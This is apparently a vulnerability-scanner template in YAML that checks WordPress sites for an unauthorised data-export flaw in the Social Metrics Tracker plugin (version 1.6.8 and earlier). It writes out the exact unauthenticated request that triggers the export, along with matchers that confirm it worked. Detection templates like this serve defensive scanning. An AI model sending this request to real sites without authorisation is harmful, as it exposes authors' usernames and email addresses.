28 lines
839 B
YAML
28 lines
839 B
YAML
id: wordpress-social-metrics-tracker
|
|
|
|
info:
|
|
name: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export
|
|
author: randomrobbie
|
|
severity: medium
|
|
description: |
|
|
The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to get information about the posts and page of the blog, including their author's username and email.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/f4eed3ba-2746-426f-b030-a8c432defeb2
|
|
tags: wordpress,wp-plugin,wp,unauth,wpscan
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "Main URL to Post"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|